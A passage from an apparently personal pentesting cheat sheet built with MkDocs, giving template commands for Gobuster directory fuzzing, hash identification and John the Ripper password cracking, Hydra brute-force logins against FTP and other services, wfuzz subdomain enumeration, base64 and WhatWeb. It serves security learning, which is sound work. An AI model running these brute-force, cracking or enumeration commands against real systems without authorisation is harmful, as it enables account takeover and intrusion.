<p>Burpsuite is an interception proxy that acts as an intermediary between a website and the attacker, allowing you to manually manage requests and responses. You can access it from the <em>rofi</em>, from the terminal with the <em>"burpsuite"</em> command, or with the shortcut "Super + shift + b" (on my Kali Linux at least).</p>
<hr />
<h2 id="7-gobuster">7. Gobuster</h2>
<p>Gobuster is a tool that allows you to enumerate directories on a website using a dictionary. This attack is called fuzzing, and it's primarily useful for gathering information. The most commonly used command is the following:</p>
<pre><code class="language-bash">gobuster dir -w {dictionary} -u {URL} -t {number of threads} -x {extensions}
</code></pre>
<ul>
<li>Dictionary → Dictionary to be used for fuzzing. The most common are:<ul>
<li><em>/usr/share/wordlists/dirb/common.txt</em></li>
<li><em>/usr/share/wordlsists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt</em></li>
</ul>
</li>
<li>URL → The URL on which the attack will be carried out. For example, http://{victim IP}</li>
<li>Number of threads → Number of threads used in the attack (to make it faster). For example, 20</li>
<li>Extensions → The extensions directories can have (html, php, txt, php.bak). For this, it's best to use the SecLists dictionary.</li>
</ul>
<hr />
<h2 id="8-hash-identifier-john-the-ripper">8. Hash-identifier + John The Ripper</h2>
<p>These two tools are often used together. The first, <em>hash-identifier</em>, is used to identify the type of hash used to encrypt a string, and <em>John The Ripper</em> is used to decrypt it (to use it, you must pass the hash type as a parameter). The commands are as follows:</p>
<pre><code class="language-bash">hash-identifier
john --format=Raw-{Tipo hash} --wordlist={dictionary} {file with the hash}
</code></pre>
<p>The dictionary par excellence is <em>"/usr/share/wordlists/rockyout.txt"</em>.</p>
<hr />
<h2 id="9-hydra">9. Hydra</h2>
<p>Hydra is a tool for executing brute-force attacks. For this attack, you need to know the service you're attempting to attack (FTP, SSH, HTTP, etc.), and it's recommended to know one of the two credentials (either username or password), since if you don't know either and execute the brute-force attack with two dictionaries, it can take a long time. Below are the three most common FTP scenarios (to change the service, simply change ftp to the desired service (SSH, HTTP, etc.).</p>
<pre><code class="language-bash">hydra -l {user} -P {dictionary} ftp://{victym ip}
hydra -L {dictionary} -p {password} ftp://{victym ip}
hydra -L {dictionary} -P {dictionary} ftp://{victym ip} (don't do that, expends a lot of time)
</code></pre>
<hr />
<h1 id="10-wfuzz">10. Wfuzz</h1>
<p>Tool used to list a website's subdomains. The command used is as follows:</p>
<pre><code class="language-bash">wfuzz -c --nc 400 -t 200 -w &lt;dictionary&gt; -v &lt;domain&gt; -H &quot;HOST: FUZZ.&lt;domain&gt;&quot;
</code></pre>
<p>Thus, the <em>wfuzz</em> command searches for subdomains by changing the word <em>FUZZ</em> to the subdomains in the dictionary.</p>
<hr />
<h1 id="11-base64">11. Base64</h1>
<p>This is very useful and comes up a lot (it's used a lot). To decode base64 strings, run the following command:</p>
<pre><code class="language-bash">echo &quot;base64_string&quot; | base64 --decode
</code></pre>
<p>To encode in base64, execute the following:</p>
<pre><code class="language-bash">echo &quot;text&quot; | base64
</code></pre>
<hr />
<h1 id="12-whatweb">12. WhatWeb</h1>
<p>An open-source tool designed to identify technologies used on websites. WhatWeb can detect content management systems (CMS), blogging platforms, statistical analysis packages, JavaScript libraries, web servers, and embedded devices. It can also identify version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. The command used is as follows:</p>
<pre><code class="language-bash">whatweb http://example.com
</code></pre>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
        
<div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://www.linkedin.com/in/isa%C3%ADas-vela-sotil-b436431a4/" target="_blank" rel="noopener" title="www.linkedin.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3M135.4 416H69V202.2h66.5V416zM102.2 96a38.5 38.5 0 1 1 0 77 38.5 38.5 0 1 1 0-77m282.1 320h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9z"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../../..", "features": ["navigation.tabs", "content.code.copy", "search.highlight", "navigation.instant"], "search": "../../../assets/javascripts/workers/search.973d3a69.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../../assets/javascripts/bundle.92b07e13.min.js"></script>
      
    
  </body>
</html>